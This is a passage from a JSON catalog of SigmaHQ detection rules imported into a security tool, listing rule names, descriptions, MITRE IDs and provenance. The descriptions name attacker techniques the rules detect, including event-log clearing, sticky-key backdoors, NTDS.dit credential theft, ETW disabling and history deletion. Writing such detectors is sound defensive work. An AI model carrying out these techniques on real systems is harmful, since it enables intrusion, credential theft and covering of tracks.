arbitrary DLLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-using-coregen-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_coregen.yml" } }, { "id": "sigmahq-sigma-0fadd880-6af3-4610-b1e5-008dc3a11b8a", "type": "detection", "name": "Potential Suspicious BPF Activity - Linux", "description": "Detects the presence of \"bpf_probe_write_user\" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-bpf-activity-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0fadd880-6af3-4610-b1e5-008dc3a11b8a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml" } }, { "id": "sigmahq-sigma-0fc35fc3-efe6-4898-8a37-0b233339524f", "type": "detection", "name": "Suspicious ScreenSave Change by Reg.exe", "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-screensave-change-by-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_screensaver.yml" } }, { "id": "sigmahq-sigma-0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", "type": "detection", "name": "Remote Schedule Task Lateral Movement via ATSvc", "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053", "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-lateral-movement-via-atsvc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" } }, { "id": "sigmahq-sigma-10018e73-06ec-46ec-8107-9172f1e04ff2", "type": "detection", "name": "Remote Server Service Abuse for Lateral Movement", "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-server-service-abuse-for-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10018e73-06ec-46ec-8107-9172f1e04ff2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" } }, { "id": "sigmahq-sigma-100ef69e-3327-481c-8e5c-6d80d9507556", "type": "detection", "name": "Important Windows Eventlog Cleared", "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-windows-eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "100ef69e-3327-481c-8e5c-6d80d9507556", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml" } }, { "id": "sigmahq-sigma-1012f107-b8f1-4271-af30-5aed2de89b39", "type": "detection", "name": "Terminal Service Process Spawn", "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/terminal-service-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1012f107-b8f1-4271-af30-5aed2de89b39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml" } }, { "id": "sigmahq-sigma-10227522-8429-47e6-a301-f2b2d014e7ad", "type": "detection", "name": "Macos Remote System Discovery", "description": "Detects the enumeration of other remote systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macos-remote-system-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10227522-8429-47e6-a301-f2b2d014e7ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" } }, { "id": "sigmahq-sigma-1027d292-dd87-4a1a-8701-2abe04d7783c", "type": "detection", "name": "PSScriptPolicyTest Creation By Uncommon Process", "description": "Detects the creation of the \"PSScriptPolicyTest\" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psscriptpolicytest-creation-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1027d292-dd87-4a1a-8701-2abe04d7783c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml" } }, { "id": "sigmahq-sigma-102e11e3-2db5-4c9e-bc26-357d42585d21", "type": "detection", "name": "Bulk Deletion Changes To Privileged Account Permissions", "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bulk-deletion-changes-to-privileged-account-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "102e11e3-2db5-4c9e-bc26-357d42585d21", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml" } }, { "id": "sigmahq-sigma-10344bb3-7f65-46c2-b915-2d00d47be5b0", "type": "detection", "name": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI", "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ie-zonemap-setting-downgraded-to-mycomputer-zone-for-http-protocols-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10344bb3-7f65-46c2-b915-2d00d47be5b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml" } }, { "id": "sigmahq-sigma-104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "type": "detection", "name": "File Download Using ProtocolHandler.exe", "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-using-protocolhandler-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_protocolhandler_download.yml" } }, { "id": "sigmahq-sigma-106d7cbd-80ff-4985-b682-a7043e5acb72", "type": "detection", "name": "Loading of Kernel Module via Insmod", "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/loading-of-kernel-module-via-insmod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "106d7cbd-80ff-4985-b682-a7043e5acb72", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_load_module_insmod.yml" } }, { "id": "sigmahq-sigma-1070db9a-3e5d-412e-8e7b-7183b616e1b3", "type": "detection", "name": "Persistence Via Sticky Key Backdoor", "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-sticky-key-backdoor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml" } }, { "id": "sigmahq-sigma-10b97915-ec8d-455f-a815-9a78926585f6", "type": "detection", "name": "Kubernetes Rolebinding Modification", "description": "Detects when a Kubernetes Rolebinding is created or modified.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-rolebinding-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10b97915-ec8d-455f-a815-9a78926585f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml" } }, { "id": "sigmahq-sigma-10c14723-61c7-4c75-92ca-9af245723ad2", "type": "detection", "name": "HackTool - Potential Impacket Lateral Movement Activity", "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1047", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-potential-impacket-lateral-movement-activity.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10c14723-61c7-4c75-92ca-9af245723ad2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml" } }, { "id": "sigmahq-sigma-10cb6535-b31d-4512-9962-513dcbc42cc1", "type": "detection", "name": "PUA - System Informer Driver Load", "description": "Detects driver load of the System Informer tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-system-informer-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10cb6535-b31d-4512-9962-513dcbc42cc1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_pua_system_informer.yml" } }, { "id": "sigmahq-sigma-10fb649c-3600-4d37-b1e6-56ea90bb7e09", "type": "detection", "name": "User Added To Highly Privileged Group", "description": "Detects addition of users to highly privileged groups via \"Net\" or \"Add-LocalGroupMember\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-highly-privileged-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10fb649c-3600-4d37-b1e6-56ea90bb7e09", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml" } }, { "id": "sigmahq-sigma-11063ec2-de63-4153-935e-b1a8b9e616f1", "type": "detection", "name": "Linux Remote System Discovery", "description": "Detects the enumeration of other remote systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-remote-system-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11063ec2-de63-4153-935e-b1a8b9e616f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" } }, { "id": "sigmahq-sigma-1114e048-b69c-4f41-bc20-657245ae6e3f", "type": "detection", "name": "User Discovery And Export Via Get-ADUser Cmdlet", "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-discovery-and-export-via-get-aduser-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1114e048-b69c-4f41-bc20-657245ae6e3f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml" } }, { "id": "sigmahq-sigma-1139d2e2-84b1-4226-b445-354492eba8ba", "type": "detection", "name": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/usage-of-web-request-commands-and-cmdlets-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1139d2e2-84b1-4226-b445-354492eba8ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" } }, { "id": "sigmahq-sigma-114de787-4eb2-48cc-abdb-c0b449f93ea4", "type": "detection", "name": "Suspicious X509Enrollment - Process Creation", "description": "Detect use of X509Enrollment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-x509enrollment-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml" } }, { "id": "sigmahq-sigma-114e7f1c-f137-48c8-8f54-3088c24ce4b9", "type": "detection", "name": "Remote Access Tool - AnyDesk Silent Installation", "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-silent-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml" } }, { "id": "sigmahq-sigma-115fdba9-f017-42e6-84cf-d5573bf2ddf8", "type": "detection", "name": "Disable of ETW Trace - Powershell", "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-of-etw-trace-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" } }, { "id": "sigmahq-sigma-11701de9-d5a5-44aa-8238-84252f131895", "type": "detection", "name": "Docker Container Discovery Via Dockerenv Listing", "description": "Detects listing or file reading of \".dockerenv\" which can be a sing of potential container discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/docker-container-discovery-via-dockerenv-listing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11701de9-d5a5-44aa-8238-84252f131895", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml" } }, { "id": "sigmahq-sigma-117d3d3a-755c-4a61-b23e-9171146d094c", "type": "detection", "name": "Suspicious Outlook Macro Created", "description": "Detects the creation of a macro file for Outlook.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-outlook-macro-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "117d3d3a-755c-4a61-b23e-9171146d094c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml" } }, { "id": "sigmahq-sigma-1182f3b3-e716-4efa-99ab-d2685d04360f", "type": "detection", "name": "History File Deletion", "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/history-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1182f3b3-e716-4efa-99ab-d2685d04360f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" } }, { "id": "sigmahq-sigma-1193d960-2369-499f-a158-7b50a31df682", "type": "detection", "name": "Potential Suspicious Browser Launch From Document Reader Process", "description": "Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-browser-launch-from-document-reader-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1193d960-2369-499f-a158-7b50a31df682", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_browser_launch_from_document_reader_process.yml" } }, { "id": "sigmahq-sigma-11b1ed55-154d-4e82-8ad7-83739298f720", "type": "detection", "name": "NTDS.DIT Creation By Uncommon Process", "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon process or a process located in a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntds-dit-creation-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11b1ed55-154d-4e82-8ad7-83739298f720", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml" } }, { "id": "sigmahq-sigma-11b52f18-aaec-4d60-9143-5dd8cc4706b9", "type": "detection", "name": "Invoke-Obfuscation RUNDLL LAUNCHER - System", "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-rundll-launcher-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml" } }, { "id": "sigmahq-sigma-11c767ae-500b-423b-bae3-b234450736ed", "type": "detection", "name": "Users Added to Global or Device Admin Roles", "description": "Monitor and alert for users added to device admin roles.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/users-added-to-global-or-device-admin-roles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11c767ae-500b-423b-bae3-b234450736ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml" } }, { "id": 